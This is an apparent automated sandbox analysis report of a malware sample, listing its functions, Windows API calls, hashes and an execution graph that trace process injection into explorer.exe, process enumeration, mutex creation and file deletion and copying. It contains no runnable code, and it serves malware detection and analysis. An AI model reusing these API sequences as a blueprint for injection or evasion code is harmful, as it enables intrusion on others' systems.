      • Opcode Fuzzy Hash: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
      Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 530 401973-4019ae call 4011cd Sleep call 401452 541 4019b0-4019b8 call 401553 530->541 542 4019bd-401a03 call 4011cd 530->542 541->542
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
      • Opcode Fuzzy Hash: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
      Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
      • Opcode Fuzzy Hash: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
      Function 02D09298 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D092E9
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: a60d0903171bb040df40a45acbfe08e2f279fbb6208a01b730564eeaa3839f7b
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: 08112B79A00208EFDB01DF98C985E98BBF5EF08750F158094F9489B3A2D371EA50DF90
      Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
      • Opcode Fuzzy Hash: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
      Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
      • Opcode Fuzzy Hash: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B

      Non-executed Functions

      Function 02BB092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: .$GetProcAddress.$l
      • API String ID: 0-2784972518
      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
      • Instruction ID: 3dbabdb5a771a9396e0fce050b8c209f72aaead305440d692354e42e68afd913
      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
      • Instruction Fuzzy Hash: CC3168B6900609CFDB11DF99C880AEEBBF9FF08324F14448AD941A7250D7B1EA45CBA4
      Function 02D08EB6 Relevance: .1, Instructions: 61COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction ID: 9ce49a4fe96509cbbb473ee0bad67b5a8315427a618f0db5f00b6ec1a2e5d8d5
      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction Fuzzy Hash: 79115E72340100AFDB54DF65DCC1FA677EAEB89364B1980A9ED04CB3A5D676EC42CB60
      Function 02BB0D90 Relevance: .0, Instructions: 43COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
      • Instruction ID: 141ebb122daae2a63aa486174569186e2aa7f2c15bce359390d8fa0b01a2a6c7
      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
      • Instruction Fuzzy Hash: 1701A276A106048FDF22EF24C805BFF33E5FF86216F4549E5D90A97281E7B4A9418B90
      Function 004023E5 Relevance: .0, Instructions: 12COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
      • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
      • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
      • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
      Function 004026A0 Relevance: .0, Instructions: 9COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
      • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
      • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
      • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2

      Execution Graph

      Execution Coverage:42.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:8%
      Total number of Nodes:200
      Total number of Limit Nodes:18
      execution_graph 2317 8751a35 2318 8751a3a 2317->2318 2321 8751aa8 2318->2321 2331 8751af8 2321->2331 2324 8751a9b 2325 8751ac3 SleepEx 2325->2325 2326 8751ad3 2325->2326 2337 87522ec 2326->2337 2333 8751b2f 2331->2333 2332 8751aba 2332->2324 2332->2325 2333->2332 2334 8751bf8 RtlCreateHeap 2333->2334 2335 8751c29 2334->2335 2335->2332 2336 8751da8 CreateThread FindCloseChangeNotification CreateThread 2335->2336 2336->2332 2354 8753d1c 2336->2354 2362 8753df8 2336->2362 2338 875230a 2337->2338 2365 8754b68 2338->2365 2340 8751ae8 2341 8751eb4 2340->2341 2371 8754db8 2341->2371 2343 8751eef 2344 8751f20 CreateMutexExA 2343->2344 2345 8751f3a 2344->2345 2375 8754f28 2345->2375 2347 8751f79 2380 875202c 2347->2380 2352 8751fe6 2392 8752394 2352->2392 2398 8752df8 2352->2398 2355 8753dd3 2354->2355 2356 8753d39 CreateToolhelp32Snapshot 2354->2356 2357 8753d4d Process32First 2356->2357 2358 8753dbb SleepEx 2356->2358 2360 8753d65 2357->2360 2358->2355 2358->2356 2359 8753db2 FindCloseChangeNotification 2359->2358 2360->2359 2361 8753da0 Process32Next 2360->2361 2361->2360 2363 8753e2e 2362->2363 2364 8753e0a EnumWindows SleepEx 2362->2364 2364->2363 2364->2364 2366 8754b91 2365->2366 2367 8754ba5 GetTokenInformation 2366->2367 2370 8754c02 2366->2370 2368 8754bd0 2367->2368 2369 8754bda GetTokenInformation 2368->2369 2369->2370 2370->2340 2372 8754de5 GetVolumeInformationA 2371->2372 2374 8754e38 2372->2374 2374->2343 2378 8754f4a 2375->2378 2376 8755006 ObtainUserAgentString 2376->2347 2377 8754f8b RegQueryValueExA 2377->2378 2378->2377 2379 8754fde 2378->2379 2379->2376 2382 875204f 2380->2382 2381 8751fa5 CreateFileMappingA 2381->2352 2382->2381 2383 87520b3 DeleteFileW CopyFileW 2382->2383 2391 8752166 2382->2391 2383->2381 2384 87520d3 DeleteFileW 2383->2384 2387 87520e9 2384->2387 2386 8752183 CreateFileW 2386->2381 2388 875211e DeleteFileW 2387->2388 2389 8752132 2388->2389 2405 8754a48 2389->2405 2401 87535b8 2391->2401 2393 87523c5 2392->2393 2410 8753414 CreateFileW 2393->2410 2395 87523da 2412 8752434 2395->2412 2397 87523eb 2397->2352 2399 8753414 CreateFileW 2398->2399 2400 8752e1b 2399->2400 2400->2352 2402 87535d9 2401->2402 2403 87535f9 GetUserNameW 2402->2403 2404 875361a 2403->2404 2404->2386 2406 8754a6f 2405->2406 2407 8754a8f SetFileAttributesW CreateFileW 2406->2407 2408 8754ada SetFileTime 2407->2408 2409 8754afb 2408->2409 2409->2391 2411 8753469 2410->2411 2411->2395 2436 8753f08 2412->2436 2414 8752884 2414->2397 2415 8752487 2415->2414 2431 87526bc 2415->2431 2435 8754a48 3 API calls 2415->2435 2416 87528c5 2418 8753f08 2 API calls 2416->2418 2417 87526e0 2420 8752821 2417->2420 2428 875277f 2417->2428 2433 87526f8 2417->2433 2419 87528ec 2418->2419 2419->2414 2425 8752968 2 API calls 2419->2425 2421 8753f08 2 API calls 2420->2421 2424 8752848 2421->2424 2422 8752794 DeleteFileW DeleteFileW 2423 87527b6 2422->2423 2426 8753f08 2 API calls 2423->2426 2424->2414 2430 8752968 2 API calls 2424->2430 2425->2414 2427 87527e0 2426->2427 2432 87527fd SleepEx RtlExitUserThread 2427->2432 2428->2414 2428->2422 2429 8753f08 2 API calls 2429->2433 2430->2414 2431->2416 2431->2417 2432->2414 2433->2414 2433->2428 2433->2429 2440 8752968 2433->2440 2435->2431 2437 8753f37 2436->2437 2446 87540a4 2437->2446 2439 8754057 2439->2415 2441 8752971 2440->2441 2444 8752d8b 2440->2444 2442 87540a4 2 API calls 2441->2442 2445 8752a70 2441->2445 2442->2445 2443 8753f08 2 API calls 2443->2444 2444->2433 2445->2443 2445->2444 2447 87540e7 2446->2447 2448 87540ee 2446->2448 2447->2439 2448->2447 2449 875439e RtlAllocateHeap 2448->2449 2450 87543cb 2449->2450 2450->2447 2451 87543d7 RtlReAllocateHeap 2450->2451 2451->2450 2452 2f21a35 2453 2f21a3a 2452->2453 2456 2f21aa8 2453->2456 2466 2f21af8 2456->2466 2459 2f21a9b 2460 2f21ac3 SleepEx 2460->2460 2461 2f21ad3 2460->2461 2473 2f222ec 2461->2473 2468 2f21b2f 2466->2468 2467 2f21aba 2467->2459 2467->2460 2468->2467 2469 2f21bf8 RtlCreateHeap 2468->2469 2470 2f21c29 2469->2470 2470->2467 2471 2f21da8 CreateThread 2470->2471 2472 2f21dd9 CreateThread 2471->2472 2493 2f23d1c 2471->2493 2472->2467 2490 2f23df8 2472->2490 2474 2f2230a 2473->2474 2498 2f24b68 2474->2498 2476 2f21ae8 2477 2f21eb4 2476->2477 2504 2f24db8 2477->2504 2479 2f21eef 2480 2f21f20 CreateMutexExA 2479->2480 2481 2f21f3a 2480->2481 2508 2f24f28 2481->2508 2483 2f21f79 2512 2f2202c 2483->2512 2488 2f21fe6 2516 2f22394 2488->2516 2522 2f22df8 2488->2522 2491 2f23e0a EnumWindows SleepEx 2490->2491 2492 2f23e2e 2490->2492 2491->2491 2491->2492 2494 2f23dd3 2493->2494 2495 2f23d39 CreateToolhelp32Snapshot 2493->2495 2496 2f23dbb SleepEx 2495->2496 2497 2f23d4d 2495->2497 2496->2494 2496->2495 2497->2496 2499 2f24b91 2498->2499 2500 2f24ba5 GetTokenInformation 2499->2500 2503 2f24c02 2499->2503 2501 2f24bd0 2500->2501 2502 2f24bda GetTokenInformation 2501->2502 2502->2503 2503->2476 2505 2f24de5 GetVolumeInformationA 2504->2505 2507 2f24e38 2505->2507 2507->2479 2509 2f24f4a 2508->2509 2510 2f24fde 2509->2510 2511 2f24f8b RegQueryValueExA 2509->2511 2510->2483 2511->2509 2515 2f2204f 2512->2515 2513 2f21fa5 CreateFileMappingA 2513->2488 2514 2f22183 CreateFileW 2514->2513 2515->2513 2515->2514 2517 2f223c5 2516->2517 2525 2f23414 CreateFileW 2517->2525 2519 2f223da 2527 2f22434 2519->2527 2521 2f223eb 2521->2488 2523 2f23414 CreateFileW 2522->2523 2524 2f22e1b 2523->2524 2524->2488 2526 2f23469 2525->2526 2526->2519 2549 2f23f08 2527->2549 2529 2f226e0 2532 2f2277f 2529->2532 2533 2f22821 2529->2533 2546 2f226f8 2529->2546 2530 2f228c5 2531 2f23f08 RtlAllocateHeap 2530->2531 2537 2f228ec 2531->2537 2534 2f22794 DeleteFileW DeleteFileW 2532->2534 2545 2f22884 2532->2545 2535 2f23f08 RtlAllocateHeap 2533->2535 2536 2f227b6 2534->2536 2540 2f22848 2535->2540 2539 2f23f08 RtlAllocateHeap 2536->2539 2538 2f22968 RtlAllocateHeap 2537->2538 2537->2545 2538->2545 2541 2f227e0 2539->2541 2542 2f22968 RtlAllocateHeap 2540->2542 2540->2545 2544 2f227fd SleepEx RtlExitUserThread 2541->2544 2542->2545 2543 2f23f08 RtlAllocateHeap 2543->2546 2544->2545 2545->2521 2546->2532 2546->2543 2546->2545 2553 2f22968 2546->2553 2548 2f22487 2548->2529 2548->2530 2548->2545 2550 2f23f37 2549->2550 2559 2f240a4 2550->2559 2552 2f24057 2552->2548 2554 2f22971 2553->2554 2556 2f22d8b 2553->2556 2555 2f240a4 RtlAllocateHeap 2554->2555 2558 2f22a70 2554->2558 2555->2558 2556->2546 2557 2f23f08 RtlAllocateHeap 2557->2556 2558->2556 2558->2557 2560 2f240e7 2559->2560 2561 2f240ee 2559->2561 2560->2552 2561->2560 2562 2f2439e RtlAllocateHeap 2561->2562 2562->2560

      Executed Functions

      Function 087535B8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: NameUser
      • String ID:
      • API String ID: 2645101109-0
      • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
      • Instruction ID: ece3728c4093050e5d571a6c77323dfe9c6eaa60557db6bd54d602e0a60d787c
      • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
      • Instruction Fuzzy Hash: 2E114C34718B4C4FCB90EF6C901836EB6D2FBDC306F400A6E984EC3358DAB889458781
      Function 08752434 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 506filethreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 105 8752434-8752491 call 8753f08 108 8752497-875249c 105->108 109 875293f 105->109 108->109 110 87524a2-87524a5 108->110 111 8752945-875295f 109->111 110->109 112 87524ab-87524b6 110->112 113 87524bc-87524ef call 87550f0 112->113 114 875292f-875293d call 8755470 112->114 113->114 120 87524f5-875251a call 8755044 call 8755204 113->120 114->109 114->111 125 8752545 120->125 126 875251c-8752536 120->126 127 875254a-8752563 call 8755204 125->127 126->125 131 8752538-8752543 126->131 132 87526d2-87526da 127->132 133 8752569-875257c 127->133 131->127 136 87528c5-87528f2 call 8753f08 132->136 137 87526e0-87526e4 132->137 134 87525ce-87525d0 133->134 135 875257e-87525c5 133->135 134->132 141 87525d6-8752648 call 8755490 134->141 135->134 150 87528f4-87528fb 136->150 151 8752927-875292d 136->151 139 875278c-875281c call 87547c8 DeleteFileW * 2 call 875356c call 8753f08 call 8755470 SleepEx RtlExitUserThread 137->139 140 87526ea-87526f2 137->140 139->114 144 8752821-875284e call 8753f08 140->144 145 87526f8-8752705 140->145 184 87526c7-87526cd call 8755470 141->184 185 875264a-87526c2 call 8755044 call 87550f0 call 8754a48 call 87553f4 141->185 144->151 159 8752854-875285b 144->159 145->151 161 875270b-875270e 145->161 150->151 155 87528fd-8752900 150->155 151->114 155->151 160 8752902-8752922 call 8752968 call 8755470 155->160 159->151 163 8752861-8752864 159->163 160->151 161->151 166 8752714-8752718 161->166 163->151 170 875286a-87528c3 call 8752968 call 87547c8 call 8755470 163->170 172 875277f-8752786 166->172 173 875271a-8752747 call 8753f08 166->173 170->151 172->139 172->151 182 8752779-875277d 173->182 183 8752749-8752750 173->183 182->172 182->173 183->182 187 8752752-8752755 183->187 184->132 185->184 187->182 192 8752757-8752774 call 8752968 call 8755470 187->192 192->182
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: DeleteFile$ExitSleepThreadUser
      • String ID: |:|
      • API String ID: 2796381497-3736120136
      • Opcode ID: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction ID: a4d6641c5a0770538b28230b55e5ab02bace721750c55dfafe486b85c1773c0d
      • Opcode Fuzzy Hash: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction Fuzzy Hash: 23E1B730728F488BDB59AB28C4583AA76D1FB98312F14062ED89FD3395DF74E9028795
      Function 02F22434 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 506filethreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 2f22434-2f22491 call 2f23f08 3 2f22497-2f2249c 0->3 4 2f2293f 0->4 3->4 5 2f224a2-2f224a5 3->5 6 2f22945-2f2295f 4->6 5->4 7 2f224ab-2f224b6 5->7 8 2f2292f-2f2293d call 2f25470 7->8 9 2f224bc-2f224ef call 2f250f0 7->9 8->4 8->6 9->8 15 2f224f5-2f2251a call 2f25044 call 2f25204 9->15 20 2f22545 15->20 21 2f2251c-2f22536 15->21 22 2f2254a-2f22563 call 2f25204 20->22 21->20 25 2f22538-2f22543 21->25 27 2f226d2-2f226da 22->27 28 2f22569-2f2257c 22->28 25->22 29 2f226e0-2f226e4 27->29 30 2f228c5-2f228f2 call 2f23f08 27->30 31 2f225ce-2f225d0 28->31 32 2f2257e-2f225c5 28->32 34 2f226ea-2f226f2 29->34 35 2f2278c-2f2281c call 2f247c8 DeleteFileW * 2 call 2f2356c call 2f23f08 call 2f25470 SleepEx RtlExitUserThread 29->35 43 2f22927-2f2292d 30->43 44 2f228f4-2f228fb 30->44 31->27 36 2f225d6-2f22648 call 2f25490 31->36 32->31 38 2f22821-2f2284e call 2f23f08 34->38 39 2f226f8-2f22705 34->39 35->8 80 2f226c7-2f226cd call 2f25470 36->80 81 2f2264a-2f226c2 call 2f25044 call 2f250f0 call 2f24a48 call 2f253f4 36->81 38->43 53 2f22854-2f2285b 38->53 39->43 55 2f2270b-2f2270e 39->55 43->8 44->43 49 2f228fd-2f22900 44->49 49->43 54 2f22902-2f22922 call 2f22968 call 2f25470 49->54 53->43 58 2f22861-2f22864 53->58 54->43 55->43 61 2f22714-2f22718 55->61 58->43 63 2f2286a-2f228c3 call 2f22968 call 2f247c8 call 2f25470 58->63 65 2f2271a-2f22747 call 2f23f08 61->65 66 2f2277f-2f22786 61->66 63->43 78 2f22779-2f2277d 65->78 79 2f22749-2f22750 65->79 66->35 66->43 78->65 78->66 79->78 84 2f22752-2f22755 79->84 80->27 81->80 84->78 89 2f22757-2f22774 call 2f22968 call 2f25470 84->89 89->78
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: DeleteFile$ExitSleepThreadUser
      • String ID: |:|
      • API String ID: 2796381497-3736120136
      • Opcode ID: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction ID: b61b1a19a0d1122c38a0cb15e3304c09cdeb41e5acb571377820d73b109d2262
      • Opcode Fuzzy Hash: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
      • Instruction Fuzzy Hash: B4E1C830718F588FD719EB2888687BA76D1FB99351F50062ED99FD3280DF34E9058B86
      Function 08751AF8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299threadmemoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 210 8751af8-8751b2d 211 8751b2f-8751b36 210->211 212 8751b4b-8751b4f 211->212 213 8751b51-8751b5d 212->213 214 8751b38-8751b49 212->214 215 8751b74-8751b79 213->215 216 8751b5f-8751b65 213->216 214->212 218 8751b7f-8751b86 215->218 217 8751b67-8751b72 216->217 216->218 217->218 219 8751b91-8751b97 218->219 220 8751b88-8751b8f 218->220 219->211 221 8751b99-8751ba3 219->221 220->219 220->221 222 8751ba5-8751bac 221->222 223 8751bb2-8751bca call 8751e30 221->223 222->223 224 8751e07 222->224 223->224 228 8751bd0-8751bf2 call 8751e30 223->228 226 8751e09-8751e27 224->226 228->224 231 8751bf8-8751c27 RtlCreateHeap 228->231 232 8751c29-8751c43 call 8755044 231->232 232->224 236 8751c49-8751c61 call 87553f4 232->236 236->232 239 8751c63-8751c7e call 8751e30 236->239 239->224 242 8751c84-8751ca3 call 8751e30 239->242 242->224 245 8751ca9-8751cc8 call 8751e30 242->245 245->224 248 8751cce-8751ced call 8751e30 245->248 248->224 251 8751cf3-8751d12 call 8751e30 248->251 251->224 254 8751d18-8751d37 call 8751e30 251->254 254->224 257 8751d3d-8751d98 call 8754c44 * 3 254->257 257->224 264 8751d9a-8751da1 257->264 264->224 265 8751da3-8751da6 264->265 265->224 266 8751da8-8751df8 CreateThread FindCloseChangeNotification CreateThread 265->266 267 8751e00-8751e05 266->267 267->226
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: Create$Thread$ChangeCloseFindHeapNotification
      • String ID: iP+
      • API String ID: 1654390035-51890417
      • Opcode ID: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction ID: b654dd93c1979b6b15e79898f85312fa323dae96465564b0a465d7091f29bc5e
      • Opcode Fuzzy Hash: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction Fuzzy Hash: 4291B330618A088FCF58EF18D8957A573D6FB94303B98017EDC4ECB25AEA70D541CBA6
      Function 0875202C Relevance: 7.7, APIs: 5, Instructions: 172fileCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • DeleteFileW.KERNEL32 ref: 087520B6
      • CopyFileW.KERNEL32 ref: 087520C5
      • DeleteFileW.KERNEL32 ref: 087520D6
      • DeleteFileW.KERNEL32 ref: 08752121
        • Part of subcall function 08754A48: SetFileAttributesW.KERNEL32 ref: 08754A97
        • Part of subcall function 08754A48: CreateFileW.KERNEL32 ref: 08754AC1
        • Part of subcall function 08754A48: SetFileTime.KERNEL32 ref: 08754AEC
      • CreateFileW.KERNEL32 ref: 087521AD
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: File$Delete$Create$AttributesCopyTime
      • String ID:
      • API String ID: 642576546-0
      • Opcode ID: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction ID: 26f786566129bb6357fc72cdf92b551c5fd19da4489c06f55c9e422d06f12361
      • Opcode Fuzzy Hash: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction Fuzzy Hash: 04414C20718A4C4FDFA8EF6C945836E35D2EBCC212F50053EA90EC7389DEB89D068795
      Function 08753D1C Relevance: 7.6, APIs: 5, Instructions: 72processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
